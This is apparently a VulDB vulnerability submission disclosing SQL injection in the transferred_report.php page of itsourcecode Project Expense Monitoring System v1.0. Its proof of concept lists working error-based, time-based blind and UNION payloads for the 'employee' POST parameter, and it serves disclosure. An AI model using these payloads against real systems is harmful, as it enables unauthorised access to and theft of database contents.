Title | itsourcecode Project Expense Monitoring System v1.0 SQLi |
---|
Description | There are multiple SQLi injection vulnerabilities in the transferred_report.php page. Attackers can pass special SQL statements in the "$_POST['start']", "$_POST['end']", and "$_POST['employee']" parameters to obtain sensitive data in the database.
POC:
Parameter: employee (POST)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: employee=2' AND EXTRACTVALUE(8219,CONCAT(0x5c,0x7162627871,(SELECT (ELT(8219=8219,1))),0x717a627a71)) AND 'Priq'='Priq&search=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: employee=2' AND (SELECT 7024 FROM (SELECT(SLEEP(5)))kFSQ) AND 'IGyK'='IGyK&search=
Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: employee=2' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162627871,0x45716f47644d666d664649754b656c745a50746f714c474274445472556469537478474853514c69,0x717a627a71),NULL,NULL,NULL-- -&search= |
---|
Source | ⚠️ https://github.com/DeepMountains/zzz/blob/main/CVE3-4.md |
---|
User | GUOTINGTING (ID 73614) |
---|
Submission | 08/17/2024 02:16 PM (2 months ago) |
---|
Moderation | 08/19/2024 04:12 PM (2 days later) |
---|
Status | Accepted |
---|
VulDB Entry | 275121 |
---|
Points | 20 |
---|